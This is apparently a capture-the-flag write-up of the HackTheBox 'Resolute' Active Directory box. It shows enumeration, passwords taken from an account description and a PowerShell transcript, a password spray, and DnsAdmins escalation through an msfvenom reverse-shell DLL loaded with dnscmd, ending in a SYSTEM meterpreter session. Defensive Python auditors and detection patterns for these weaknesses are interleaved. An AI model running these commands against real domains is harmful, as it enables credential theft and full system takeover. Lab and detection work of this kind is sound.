NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-29 17:59 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 17:59
Completed NSE at 17:59, 0.00s elapsed
Initiating NSE at 17:59
Completed NSE at 17:59, 0.00s elapsed
Initiating NSE at 17:59
Completed NSE at 17:59, 0.00s elapsed
Initiating Ping Scan at 17:59
Scanning 10.10.10.169 [4 ports]
Completed Ping Scan at 17:59, 0.61s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:59
Completed Parallel DNS resolution of 1 host. at 17:59, 0.55s elapsed
Initiating SYN Stealth Scan at 17:59
Scanning 10.10.10.169 [1000 ports]
Discovered open port 135/tcp on 10.10.10.169
Discovered open port 139/tcp on 10.10.10.169
Discovered open port 445/tcp on 10.10.10.169
Discovered open port 53/tcp on 10.10.10.169
Discovered open port 636/tcp on 10.10.10.169
Discovered open port 88/tcp on 10.10.10.169
Discovered open port 593/tcp on 10.10.10.169
Discovered open port 389/tcp on 10.10.10.169
Discovered open port 464/tcp on 10.10.10.169
Discovered open port 3268/tcp on 10.10.10.169
Discovered open port 3269/tcp on 10.10.10.169
Completed SYN Stealth Scan at 17:59, 5.30s elapsed (1000 total ports)
Initiating Service scan at 17:59
Scanning 11 services on 10.10.10.169
Completed Service scan at 17:59, 32.87s elapsed (11 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.169
Retrying OS detection (try #2) against 10.10.10.169
Retrying OS detection (try #3) against 10.10.10.169
Initiating Traceroute at 17:59
Completed Traceroute at 17:59, 0.24s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 17:59
Completed Parallel DNS resolution of 2 hosts. at 17:59, 0.21s elapsed
NSE: Script scanning 10.10.10.169.
Initiating NSE at 17:59
Completed NSE at 18:00, 19.85s elapsed
Initiating NSE at 18:00
Completed NSE at 18:02, 121.98s elapsed
Initiating NSE at 18:02
Completed NSE at 18:02, 0.00s elapsed
Nmap scan report for 10.10.10.169
Host is up (0.48s latency).
Not shown: 989 closed ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-29 12:40:45Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=5/29%Time=5ED10024%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Aggressive OS guesses: Microsoft Windows Server 2016 build 10586 - 14393 (95%), Microsoft Windows Server 2016 (94%), Microsoft Windows 10 1507 - 1607 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows Vista SP1 (93%), Microsoft Windows 10 (92%), Microsoft Windows 10 1507 (92%), Microsoft Windows Server 2012 (92%), Microsoft Windows Server 2012 R2 (92%), Microsoft Windows Server 2012 R2 Update 1 (92%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.103 days (since Fri May 29 15:33:50 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: Randomized
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h31m25s, deviation: 4h02m30s, median: 11m24s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2020-05-29T05:41:21-07:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-05-29T12:41:23
|_  start_date: 2020-05-29T11:52:09

TRACEROUTE (using port 110/tcp)
HOP RTT       ADDRESS
1   201.02 ms 10.10.14.1
2   239.28 ms 10.10.10.169

NSE: Script Post-scanning.
Initiating NSE at 18:02
Completed NSE at 18:02, 0.00s elapsed
Initiating NSE at 18:02
Completed NSE at 18:02, 0.00s elapsed
Initiating NSE at 18:02
Completed NSE at 18:02, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 190.07 seconds
           Raw packets sent: 1284 (58.614KB) | Rcvd: 1164 (48.694KB)
ENUMERATING FOR USERS
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[ryan] rid:[0x451]
user:[marko] rid:[0x457]
user:[sunita] rid:[0x19c9]
user:[abigail] rid:[0x19ca]
user:[marcus] rid:[0x19cb]
user:[sally] rid:[0x19cc]
user:[fred] rid:[0x19cd]
user:[angela] rid:[0x19ce]
user:[felicia] rid:[0x19cf]
user:[gustavo] rid:[0x19d0]
user:[ulf] rid:[0x19d1]
user:[stevie] rid:[0x19d2]
user:[claire] rid:[0x19d3]
user:[paulo] rid:[0x19d4]
user:[steve] rid:[0x19d5]
user:[annette] rid:[0x19d6]
user:[annika] rid:[0x19d7]
user:[per] rid:[0x19d8]
user:[claude] rid:[0x19d9]
user:[melanie] rid:[0x2775]
user:[zach] rid:[0x2776]
user:[simon] rid:[0x2777]
user:[naoki] rid:[0x2778]
Going through the user accounts one by one, I found a password stored in marko's account description:
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
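The description field is the security-relevant point here: it is readable by every authenticated domain user by default, so a password left there by an onboarding process is effectively public to the whole domain. As an added defender's example (not code from this write-up), the following Python audits the two listings above for exactly that. It assumes the output format of rpcclient's enumdomusers and querydispinfo commands, which is the format shown on this page; the sample output is constructed, with only marko's line taken from the page and the other descriptions made up.

```python
"""Audit Active Directory account descriptions for credential material.

Added example, not part of the original write-up. The samples below are
constructed in the format of rpcclient's `enumdomusers` and `querydispinfo`
output; only marko's line is taken from the page.
"""
import re
from dataclasses import dataclass

# --- constructed samples -----------------------------------------------------
ENUMDOMUSERS_SAMPLE = """\
user:[Administrator] rid:[0x1f4]
user:[marko] rid:[0x457]
user:[melanie] rid:[0x2775]
"""

QUERYDISPINFO_SAMPLE = """\
index: 0x3 RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
index: 0x2aa7 RID: 0x2775 acb: 0x00000210 Account: melanie Name: Melanie Wright Desc: Password policy reminder sent
"""

ENUMDOMUSERS_RE = re.compile(r"user:\[(?P<user>[^\]]+)\]\s+rid:\[(?P<rid>0x[0-9a-fA-F]+)\]")
QUERYDISPINFO_RE = re.compile(
    r"^index:\s*(?P<index>0x[0-9a-fA-F]+)\s+RID:\s*(?P<rid>0x[0-9a-fA-F]+)\s+"
    r"acb:\s*(?P<acb>0x[0-9a-fA-F]+)\s+Account:\s*(?P<account>\S+)\s+"
    r"Name:\s*(?P<name>.*?)\s+Desc:\s*(?P<desc>.*)$"
)
# "password <connector> <token>", connector optional ("set to", "is", ":", "=")
PASSWORD_HINT_RE = re.compile(
    r"(?i)\b(?:password|passwd|pwd|pass)\b[^A-Za-z0-9]*"
    r"(?:is|set to|reset to|changed to|=|:)?[^A-Za-z0-9]*(?P<secret>\S+)"
)
# Samba ACB (account control) bits as printed by rpcclient
ACB_FLAGS = {0x0001: "DISABLED", 0x0004: "PWNOTREQ", 0x0010: "NORMAL",
             0x0200: "PWNOEXP", 0x0400: "AUTOLOCK"}


@dataclass
class Account:
    rid: int
    acb: int
    account: str
    name: str
    desc: str


@dataclass
class Finding:
    account: str
    secret: str
    acb_flags: list


def parse_enumdomusers(text):
    """Map user name -> RID from `enumdomusers` output."""
    return {m["user"]: int(m["rid"], 16) for m in ENUMDOMUSERS_RE.finditer(text)}


def parse_querydispinfo(text):
    """Parse `querydispinfo` lines into Account records; unparseable lines are skipped."""
    accounts = []
    for line in text.splitlines():
        m = QUERYDISPINFO_RE.match(line.strip())
        if m:
            accounts.append(Account(int(m["rid"], 16), int(m["acb"], 16),
                                    m["account"], m["name"], m["desc"]))
    return accounts


def decode_acb(acb):
    """Names of the ACB bits set in an account-control value (0x210 = NORMAL + PWNOEXP)."""
    return [name for bit, name in ACB_FLAGS.items() if acb & bit]


def looks_like_secret(token):
    """Heuristic: at least 6 chars and at least one digit or symbol."""
    return len(token) >= 6 and any(c.isdigit() or not c.isalnum() for c in token)


def find_exposed_credentials(accounts):
    """Return a Finding for every description that appears to carry a password."""
    findings = []
    for acct in accounts:
        m = PASSWORD_HINT_RE.search(acct.desc)
        if not m:
            continue
        candidate = m["secret"].rstrip(".,;")
        if looks_like_secret(candidate):
            findings.append(Finding(acct.account, candidate, decode_acb(acct.acb)))
    return findings


def audit(enum_text, dispinfo_text):
    """Cross-check both listings and report exposures as dicts."""
    rids = parse_enumdomusers(enum_text)
    return [{"account": f.account, "rid": rids.get(f.account),
             "secret": f.secret, "flags": f.acb_flags}
            for f in find_exposed_credentials(parse_querydispinfo(dispinfo_text))]


if __name__ == "__main__":
    for row in audit(ENUMDOMUSERS_SAMPLE, QUERYDISPINFO_SAMPLE):
        print(f"{row['account']} (RID {row['rid']:#x}): password in description "
              f"-> {row['secret']!r}; account flags {row['flags']}")
```

Run it over saved rpcclient output from your own domain. The ACB decode is there because a password in a description combined with PWNOEXP (password never expires) means the exposure never ages out on its own; the fix is to clear the description, reset the account's password and put description fields into a periodic audit.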
USING THOSE CREDENTIALS
root@liquid:~/Desktop/HTB/resolute# evil-winrm -u marko -p Welcome123! -i 10.10.10.169

Evil-WinRM shell v2.0

Info: Establishing connection to remote endpoint

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code 1
That gave an authorization error, so the next step was to find out which account this password really belongs to.
Since I already had the list of users, I brute-forced WinRM logins with this password against it and got a hit for melanie.
Let's log in again and grab the flag:
root@liquid:~/Desktop/HTB/resolute# evil-winrm -u melanie -p Welcome123! -i 10.10.10.169

Evil-WinRM shell v2.0

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\melanie\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\melanie\Desktop> cat user.txt
0c3be45fcfe249796ccbee8d3a978540
*Evil-WinRM* PS C:\Users\melanie\Desktop>
Let's get another user.
*Evil-WinRM* PS C:\> ls -hidden

    Directory: C:\

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--hs-       12/3/2019   6:40 AM                $RECYCLE.BIN
d--hsl       9/25/2019  10:17 AM                Documents and Settings
d--h--       9/25/2019  10:48 AM                ProgramData
d--h--       12/3/2019   6:32 AM                PSTranscripts
d--hs-       9/25/2019  10:17 AM                Recovery
d--hs-       9/25/2019   6:25 AM                System Volume Information
-arhs-      11/20/2016   5:59 PM         389408 bootmgr
-a-hs-       7/16/2016   6:10 AM              1 BOOTNXT
-a-hs-       5/30/2020  10:49 AM      402653184 pagefile.sys
PSTranscripts is a hidden directory, and there are more hidden files beneath it, including a PowerShell transcript:
*Evil-WinRM* PS C:\PSTranscripts\20191203> type PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Credentials recovered from the transcript: ryan : Serv3r4Admin4cc123!
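Two things made this leak possible: PowerShell transcription records the full text of every command, including the arguments of a command that failed (the net use above never ran correctly), and the transcript directory was readable by a low-privileged user. As an added example, not from the original write-up, the following Python scanner walks a transcript and reports commands that passed credentials on the command line. It assumes the transcript layout visible on this page (header block between asterisk lines, Invoke-Expression parameter-binding lines) and models only net use; TRANSCRIPT_SAMPLE is a constructed, shortened copy of the transcript above.

```python
"""Scan PowerShell transcripts for commands that carried credentials inline.

Added example, not part of the original write-up. TRANSCRIPT_SAMPLE is a
constructed, shortened version of the transcript on the page: header fields and
the two recorded commands are kept, remoting boilerplate is trimmed.
"""
import re
from dataclasses import dataclass, field

TRANSCRIPT_SAMPLE = r"""**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Process ID: 2800
**********************
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
"""

SEPARATOR = "**********************"
HEADER_RE = re.compile(r"^(Start time|Username|RunAs User|Machine|Host Application|Process ID):\s*(.*)$")
COMMAND_VALUE_RE = re.compile(r'ParameterBinding\(Invoke-Expression\): name="Command"; value="(?P<cmd>.*)$')
NET_USE_RE = re.compile(r"(?i)\bnet(?:\.exe)?\s+use\b(?P<args>.*)")


@dataclass
class Session:
    header: dict = field(default_factory=dict)
    commands: list = field(default_factory=list)

    @property
    def username(self):
        return self.header.get("Username", "")

    @property
    def start(self):
        return self.header.get("Start time", "")


def parse_transcript(text):
    """One Session per 'transcript start' header, holding the first line of every
    Invoke-Expression command recorded after that header."""
    sessions, current, in_header = [], None, False
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Windows PowerShell transcript start":
            current = Session()
            sessions.append(current)
            in_header = True
            continue
        if in_header:
            if line == SEPARATOR:
                in_header = False
            else:
                m = HEADER_RE.match(line)
                if m:
                    current.header[m[1]] = m[2]
            continue
        m = COMMAND_VALUE_RE.search(line)
        if m and current is not None:
            current.commands.append(m["cmd"].rstrip('"'))
    return sessions


def inline_net_use_secrets(command):
    """Positional arguments after the share in `net use` occupy the password slot
    (in the malformed call on the page, the user name landed there as well).
    A literal '*' means 'prompt for it' and is not a leak; /user:NAME is the
    account name, not a secret."""
    m = NET_USE_RE.search(command)
    if not m:
        return []
    leaked, seen_share = [], False
    for tok in m["args"].split():
        if tok.startswith("/"):
            continue
        if seen_share and tok != "*":
            leaked.append(tok)
        elif tok.startswith("\\\\"):
            seen_share = True
    return leaked


def audit_transcript(text):
    """Report every recorded command that passed credentials on the command line."""
    findings = []
    for s in parse_transcript(text):
        for cmd in s.commands:
            secrets = inline_net_use_secrets(cmd)
            if secrets:
                findings.append({"username": s.username, "session_start": s.start,
                                 "command": cmd, "secrets": secrets})
    return findings


if __name__ == "__main__":
    for f in audit_transcript(TRANSCRIPT_SAMPLE):
        print(f"{f['username']} @ {f['session_start']}: {f['command']}\n"
              f"   -> inline credential material: {f['secrets']}")
```

Point it at the directory Transcription writes to (C:\PSTranscripts on this box). The finding is twofold: the command line itself is the leak, and the directory ACL decides who can collect it, so transcript output belongs on a write-only share that ordinary users cannot read back.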
root@liquid:~/Desktop/HTB/resolute# evil-winrm -i resolute.htb -u ryan -p Serv3r4Admin4cc123!

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\ryan\Documents>
GETTING ROOT ACCESS
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all

USER INFORMATION
----------------

User Name     SID
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ===============================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
User ryan is a member of the MEGABANK\DnsAdmins group. Members of that group can configure the DNS service, which runs as SYSTEM on the domain controller, to load an arbitrary plugin DLL, and that is what the following steps use.
root@liquid:~/Desktop/HTB/resolute# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.140 LPORT=9977 -f dll > liquid.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 5120 bytes
After this, the target has to be able to reach the DLL, either by uploading it or by serving it from an SMB share:
root@liquid:~/Desktop/HTB/resolute# python smbserver.py -smb2support EXPLOIT /root/Desktop/HTB/resolute/
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Then, on the victim machine:
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> dnscmd /config /serverlevelplugindll \\10.10.14.140\EXPLOIT\liquid.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> sc.exe stop dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> sc.exe start dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 3048
        FLAGS              :
In msfconsole, a multi/handler is waiting for the callback:
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.4:5678
[*] Sending stage (206403 bytes) to 10.10.10.169
[*] Meterpreter session 3 opened (10.10.14.4:5678 -> 10.10.10.169:60148) at 2020-05-30 11:20:31 -0400

meterpreter >
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > cd ../../../
meterpreter > cat root.txt
e1d94876a506850d0c20edb5405e619c
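The escalation above rests on one registry value: dnscmd /config /serverlevelplugindll writes ServerLevelPluginDll under HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters, and dns.exe loads that DLL as SYSTEM the next time the service starts. The value is absent on a default installation, so any value at all deserves a look, and a UNC path or a path outside System32 is a red flag. As an added defender's example (not code from this write-up), the Python below classifies that value and runs a detection over a constructed process-creation log modelled on the commands shown above, pairing a dnscmd plugin change with a DNS service restart by the same user. The registry location is real; the event records and their timestamps are constructed.

```python
"""Audit the DNS Server plugin-DLL setting and detect attempts to change it.

Added example, not part of the original write-up. The registry value
ServerLevelPluginDll under HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters
is the real location; SAMPLE_PROCESS_EVENTS is a constructed log modelled on
the dnscmd / sc.exe commands shown on this page.
"""
import ntpath
import re
from datetime import datetime, timedelta

DNSCMD_PLUGIN_RE = re.compile(
    r"(?i)\bdnscmd(?:\.exe)?\b.*?/config\b.*?/serverlevelplugindll\b\s*(?P<path>\S*)")
DNS_RESTART_RE = re.compile(
    r"(?i)\b(?:sc(?:\.exe)?\s+(?:stop|start)\s+dns|net(?:\.exe)?\s+(?:stop|start)\s+dns"
    r"|restart-service\s+(?:-name\s+)?dns)\b")

# Constructed process-creation events (user + command line), not real telemetry.
SAMPLE_PROCESS_EVENTS = [
    {"time": "2020-05-30T11:17:40Z", "user": r"MEGABANK\ryan",
     "cmdline": "dnscmd /zoneprint megabank.local"},
    {"time": "2020-05-30T11:18:02Z", "user": r"MEGABANK\ryan",
     "cmdline": r"dnscmd /config /serverlevelplugindll \\10.10.14.140\EXPLOIT\liquid.dll"},
    {"time": "2020-05-30T11:18:20Z", "user": r"MEGABANK\ryan", "cmdline": "sc.exe stop dns"},
    {"time": "2020-05-30T11:18:31Z", "user": r"MEGABANK\ryan", "cmdline": "sc.exe start dns"},
    {"time": "2020-05-30T13:05:00Z", "user": r"MEGABANK\Administrator",
     "cmdline": "sc.exe start dns"},
]


def assess_plugin_dll(value, system_root=r"C:\Windows"):
    """Classify a ServerLevelPluginDll value; None or '' means the value is not present."""
    if not value:
        return "ok: not configured (default)"
    if value.startswith("\\\\"):
        return "critical: plugin DLL would be loaded from a network share"
    allowed = ntpath.normcase(ntpath.join(system_root, "System32")) + "\\"
    if not ntpath.normcase(value).startswith(allowed):
        return "critical: plugin DLL outside System32"
    return "review: plugin DLL configured; verify signature and hash"


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def find_plugin_dll_changes(events):
    """Process-creation events that set ServerLevelPluginDll via dnscmd."""
    hits = []
    for ev in events:
        m = DNSCMD_PLUGIN_RE.search(ev["cmdline"])
        if m:
            hits.append({"time": ev["time"], "user": ev["user"], "path": m["path"],
                         "assessment": assess_plugin_dll(m["path"])})
    return hits


def correlate_restarts(events, window=timedelta(minutes=10)):
    """Pair each plugin change with a DNS service stop/start by the same user inside
    `window`; that pairing is what turns the setting into code execution."""
    alerts = []
    for hit in find_plugin_dll_changes(events):
        t0 = _ts(hit["time"])
        restarted = any(
            ev["user"] == hit["user"] and DNS_RESTART_RE.search(ev["cmdline"])
            and t0 <= _ts(ev["time"]) <= t0 + window
            for ev in events)
        alerts.append({**hit, "restart_followed": restarted})
    return alerts


if __name__ == "__main__":
    for a in correlate_restarts(SAMPLE_PROCESS_EVENTS):
        print(f"{a['time']} {a['user']}: {a['assessment']} ({a['path']}); "
              f"service restart within window: {a['restart_followed']}")
```

assess_plugin_dll takes the value as a string so it can be fed from whatever reads the registry on the DC; the correlation needs only user, timestamp and command line from process-creation telemetry. The preventive control the whoami output points at is membership of DnsAdmins itself: it should be treated as a tier-0 group and reviewed like Domain Admins.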